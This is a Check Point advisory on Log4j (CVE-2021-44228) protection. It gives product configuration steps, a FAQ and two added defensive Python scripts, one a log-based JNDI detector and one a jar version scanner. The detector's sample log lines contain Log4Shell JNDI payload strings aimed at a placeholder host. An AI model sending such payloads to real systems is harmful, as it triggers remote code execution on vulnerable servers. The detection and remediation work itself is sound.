How Check Point Infinity Protects Customers from the Log4j Vulnerability

On December 9th, an acute remote code execution (RCE) vulnerability was reported in the Apache logging package Log4j 2, versions 2.14.1 and below (CVE-2021-44228). Apache Log4j is the most popular Java logging library, with over 400,000 downloads from its GitHub project. The Log4j library is embedded in almost every Internet service or application we are familiar with, including Twitter, Amazon, Microsoft, Minecraft and more.

Exploiting this vulnerability is simple and allows threat actors to take control of Java-based web servers and execute code on them remotely.

Check Point’s Infinity Platform is the only security platform that offered pre-emptive protection for customers against the recent Log4j exploit (Log4Shell). Leveraging contextual AI, the platform provides precise prevention of even the most sophisticated nascent attacks, without generating false positives. Customer web applications remain safe because the security auto-updates, without the need for human intervention or rule sets, as the application and threat landscape evolves and expands.

Check Point Customers Remain Protected: Check Point has already released a new Quantum Gateway protection to prevent this attack, powered by ThreatCloud. If your Quantum gateways are updated with automatic new protections, you are already protected. Otherwise, you need to implement a new protection by following the guidelines here. We urge IT and Security teams to take immediate remediation measures on the matter.

How to ensure you are protected from the Log4j Vulnerability

  1. Make sure your IPS blade is in prevention mode
  2. Make sure your AppSec is in prevention mode
  3. Make sure Infinity NDR is configured to detect exploited servers and internal scans on your network
  4. Make sure your Harmony Endpoint is in prevention mode
  5. Make sure you scan your code using SourceGuard
  6. Scan Serverless functions with CloudGuard Workload Protection

1. Make sure your IPS blade is in prevention mode

In case your setup is not configured to auto-update, you need to make sure that you are protected.

  1. Check whether your gateway already contains the IPS update with the protection against the CVE:
    1. In SmartConsole, click Gateways & Servers.
    2. Switch the columns view to Threat Prevention.
    3. A column titled ‘Installed IPS version’ is shown for each gateway.
    4. Make sure that all gateways are updated with the latest package (from 12/12/2021).
    5. You can also verify that the specific protection is present by clicking Security Policies > Threat Prevention > IPS Protections and searching for “Apache Log4j Remote Code Execution”.
    6. The Profile column for that protection should show Prevent.
  2. If you can’t see the relevant package, update your setup with the latest package by following these steps:
    1. In SmartConsole, click Security Policies > Threat Prevention.
    2. In the Custom Policy Tools section, click Updates, and then in the IPS section click Update Now.
    3. Install the Threat Prevention policy.
    4. Repeat step 1 to make sure all gateways have been updated.

2. Make sure your AppSec is in prevention mode

  1. In the Infinity Policy dashboard, click Cloud > Assets.
  2. Search for Log4J (CVE-2021-44228) (you can use the search bar)
  3. Click on the Asset > Threat Prevention
  4. Make sure that the mode is configured to Prevent.

Upgrade Apache Log4j to the latest version (2.15.0) or apply the recommended mitigations that were published by Apache on their website.

3. Make sure Infinity NDR is configured to detect exploited servers and internal scans on your network

  1. From the Notification menu, schedule a notification on ‘Exploit: Apache Log4j’
  2. Upon email receipt, review the event from the Analytics page, take further steps to identify unauthorized scanners, and perform further remediation steps
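The notification in step 1 fires on Infinity NDR's own event; the same triage can be run against a web server's access logs when reviewing an incident. The script below is an added example written for this page, not Check Point code or part of any product. It parses combined-format access-log lines (the sample lines are constructed, with 203.0.113.0/24 documentation addresses standing in for an external host), URL-decodes the request path, flags any logged field that carries a JNDI lookup string, and then groups the hits by source address so that an internal host sending lookup strings to many distinct paths stands out as a scanner, which is the "identify unauthorized scanners" part of step 2.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# A JNDI lookup string is what a vulnerable Log4j 2.x (< 2.15.0) would evaluate when it
# logs the field. Whitespace and case are tolerated because both appear in real traffic.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Combined log format (Apache/Nginx style): ip ident user [ts] "req" status size "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not taken from any real system.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:22:49:01 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:22:49:02 +0200] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://203.0.113.5:1389/x}"',
    '10.0.0.7 - - [10/Dec/2021:22:49:03 +0200] "GET /api/v1/users?q=%24%7BJNDI%3Armi%3A%2F%2F203.0.113.5%2Fx%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:22:49:04 +0200] "GET /admin HTTP/1.1" 404 0 "-" "${ jndi:dns://203.0.113.5/x}"',
    '10.0.0.9 - - [10/Dec/2021:22:50:10 +0200] "POST /search HTTP/1.1" 200 2048 "https://intranet.example/${jndi:ldap://203.0.113.5/x}" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Dec/2021:22:51:00 +0200] "GET /docs/${version} HTTP/1.1" 200 300 "-" "curl/7.79.1"',
]


def parse_line(line):
    """Split one combined-format line into its fields; None if the line does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_jndi_hits(lines):
    """Return one record per (line, field) in which a JNDI lookup string appears."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        # The request path is logged URL-encoded, so decode it before matching;
        # headers (Referer, User-Agent) are logged as sent.
        fields = {"path": unquote(rec["path"]), "referer": rec["referer"], "ua": rec["ua"]}
        for field, value in fields.items():
            if JNDI_RE.search(value):
                hits.append({"line": n, "ip": rec["ip"], "field": field,
                             "path": fields["path"], "value": value})
    return hits


def find_scanners(hits, min_distinct_paths=3):
    """Source IPs whose hits spread over at least N distinct paths look like a sweep."""
    paths = defaultdict(set)
    for h in hits:
        paths[h["ip"]].add(h["path"].split("?", 1)[0])  # ignore the query string
    return sorted(ip for ip, ps in paths.items() if len(ps) >= min_distinct_paths)


if __name__ == "__main__":
    found = find_jndi_hits(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']}: {h['ip']} in {h['field']}: {h['value']}")
    print("likely scanners:", find_scanners(found))
```

Only the last sample line contains a lookup that is not JNDI (`${version}`), and it is correctly left alone; the threshold for calling a source a scanner is a tuning knob, and three distinct paths is only a starting point for a small intranet.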

4. Make sure your Harmony Endpoint is in prevention mode

Detection signatures have been updated to proactively protect you.
To ensure full protection, make certain your Behavioral Guard is set to Prevent mode:

  1. In Harmony Endpoint, choose Policy.
  2. Click the Behavioral Protection tab.
  3. Open the Anti-Ransomware Mode dropdown menu and click Prevent.

Log4j Technical Blog

In addition, Check Point provides investigation scripts, for both Windows and Linux, that can help you check your endpoints and determine whether they are vulnerable to the Log4j exploit.
For further information and step-by-step instructions refer to sk176951.

5. Make sure you scan your code using SourceGuard

  1. From the Check Point Infinity Portal, download and install the SourceGuard CLI for your OS.
  2. Generate an authentication token.
  3. From the command line, run “sourceguard-cli --src” with the path of the source tree to scan.
  4. Review the scan results in the Infinity Portal to make sure you are using a safe version of the Log4j library.

6. Scan Serverless functions with CloudGuard Workload Protection

  1. Static scanning of Lambda functions – identify vulnerable log4j versions and trigger a high-severity alert.
  2. Runtime protection – an input workload firewall for log4j patterns, plus behavioral analysis of outgoing traffic, such as connections to unauthorized network hosts.
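The upgrade advice in section 2 (move to 2.15.0) and the static scanning in section 6 both come down to the same question: which deployed artifacts still carry a vulnerable log4j-core? The script below is an added example written for this page, not SourceGuard, CloudGuard or any other Check Point code. It walks a directory for archives, reads the Maven `pom.properties` that log4j-core ships inside its jar, compares the version against the 2.15.0 threshold stated above, and also checks whether `JndiLookup.class` is present (Apache's published mitigation for releases that cannot be upgraded is to remove that class, so a jar without it is reported as not vulnerable). It recurses into nested archives (WAR, EAR, fat jars), which is where a vulnerable copy usually hides. The `demo()` function builds constructed sample archives in a temporary directory; they are stand-ins with placeholder bytes, not real log4j artifacts.

```python
import io
import os
import re
import tempfile
import zipfile
from pathlib import Path

FIXED_VERSION = (2, 15, 0)  # threshold given in the advisory above
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); returns None when the string is not a version."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def inspect_archive(zf, location):
    """Yield one finding per log4j-core found in this archive or any archive nested inside it."""
    names = set(zf.namelist())
    if POM_PROPS in names:
        version = None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1])
        has_jndi = JNDI_LOOKUP_CLASS in names
        # Conservative rule: an old (or unparseable) version only counts as safe once
        # JndiLookup.class has been removed from the jar.
        vulnerable = has_jndi and (version is None or version < FIXED_VERSION)
        yield {"location": location, "version": version,
               "has_jndi_lookup": has_jndi, "vulnerable": vulnerable}
    for name in sorted(names):
        if name.lower().endswith(NESTED_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from inspect_archive(inner, f"{location}!/{name}")
            except zipfile.BadZipFile:
                continue  # entry is not really an archive; skip it


def scan_tree(root):
    """Scan every archive under root and return the list of log4j-core findings."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in NESTED_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, str(path)))
            except zipfile.BadZipFile:
                continue
    return findings


def make_sample_jar(path, version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar: Maven metadata plus a placeholder class entry."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not real bytecode


def demo():
    """Build a small constructed tree (three jars and one WAR) and scan it; returns the findings."""
    with tempfile.TemporaryDirectory() as d:
        make_sample_jar(os.path.join(d, "log4j-core-2.14.1.jar"), "2.14.1")
        make_sample_jar(os.path.join(d, "log4j-core-2.15.0.jar"), "2.15.0")
        make_sample_jar(os.path.join(d, "log4j-core-2.14.1-stripped.jar"), "2.14.1",
                        include_jndi_lookup=False)
        # A WAR bundling the vulnerable jar under WEB-INF/lib, the usual hiding place.
        inner = io.BytesIO()
        make_sample_jar(inner, "2.14.1")
        with zipfile.ZipFile(os.path.join(d, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())
        return scan_tree(d)


if __name__ == "__main__":
    for f in demo():
        flag = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{flag:10} {f['location']} version={f['version']}")
```

Of the four findings the demo produces, only the plain 2.14.1 jar and the copy nested in the WAR are reported as vulnerable; the 2.15.0 jar and the 2.14.1 jar with `JndiLookup.class` removed are not. Point `scan_tree()` at an application directory or an unpacked deployment image to run it on real input.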

Log4j protection FAQ

  1. Q: Are the GW and MGMT vulnerable to the attack if IPS blade isn’t active?
    A: No. All Check Point products are protected against the vulnerability, as described in sk176865.
  2. Q: Is HTTPS inspection needed to protect against Log4j?
    A: Because some exploitation attempts may arrive over HTTPS, you should enable HTTPS inspection in order to be fully protected against the vulnerability.
  3. Q: How do I manually update the IPS protection in air-gapped environments?
    A: Please refer to sk93724, which describes the requirements.
  4. Q: Should I configure the IPS to auto-update?
    A: In order to be protected against the latest threats, we advise configuring auto-update.
  5. Q: How does the Log4j IPS protection impact performance?
    A: The Log4j protection is enabled by default in the ‘Optimized’ profile due to security considerations. Please note that enabling HTTPS inspection may decrease performance.
  6. Q: When exactly was the IPS protection published?
    A: On the same day the CVE was first published. The exact time is December 10, 22:49 GMT+2.
  7. Q: Are Check Point products and infrastructure vulnerable?
    A: No. All Check Point products are protected against the vulnerability, as described in sk176865.
  8. Q: Is there any need to define and push a new policy on the Quantum GW?
    A: There is no need to define a new policy, but you may need to install policy if the gateway is not configured to auto-update. As described in the Threat Prevention Administration Guide:

    For the IPS blade, prior to R80.20, the updates were downloaded to the Security Management Server, and only after you installed policy could the gateways enforce the updates.
    Starting from R80.20, the gateways can download the updates directly. For R80.20 and higher gateways with no internet connectivity, you must still install policy to enforce the updates.

    Please validate the updates configuration on your setup and make sure to install the policy if needed.
    For more details about IPS protection updates in R80.20 and higher, please refer to sk120255.

  9. Q: For Harmony Endpoint, does it matter what version you are using to have the relevant protection?
    A: No. The Behavioral Guard protection applies for all Harmony Endpoint versions and for both Windows as well as Linux endpoints.
  10. Q: Is Security Gateway R77 able to protect against the Log4j vulnerability?
    A: Yes. Security Gateway R81 / R80 / R77 / R75 protect against this vulnerability using the relevant IPS protection.
  11. Q: Does CloudGuard AppSec protect against the vulnerability on HTTPS traffic?
    A: Yes. Once configured with the relevant certificates, AppSec can decrypt HTTPS traffic and protect against the Log4j vulnerability.
  12. Q: If a server on the network was breached, can the GW protect against outbound communication from this server?
    A: The Quantum GW can block outbound communication to malicious domains with the Threat Prevention blades. Best security practice is to prevent the attack at the first stage, by updating the vulnerable server and protecting it with the relevant protections, such as IPS.
  13. Q: Can the GW inspect VPN traffic for the vulnerability?
    A: Yes, VPN traffic is inspected by IPS blade.

What is ThreatCloud

You can think of ThreatCloud as a brain, and like the human brain, it is made up of two lobes that work together. The right lobe, the threat intelligence, consists of millions of IoCs and telemetry updated in real time, in addition to exclusive intelligence discovered by Check Point Research, an elite group of world-renowned researchers. The left lobe, the intellect, consists of AI technology that combines the big-data threat intelligence with advanced AI capabilities to detect and block never-before-seen threats.

Instant protections from the most significant unknown software vulnerabilities

All software vulnerabilities that are found by CPR or seen in the wild, such as Log4j, are immediately fed to ThreatCloud, which propagates the appropriate protections throughout Check Point’s products, so that all Check Point customers are instantly protected with no patching needed.

That is exactly what happened last weekend. As soon as the Log4j vulnerability was reported on December 9, all relevant protections were propagated through all Check Point products (refer to sk176884).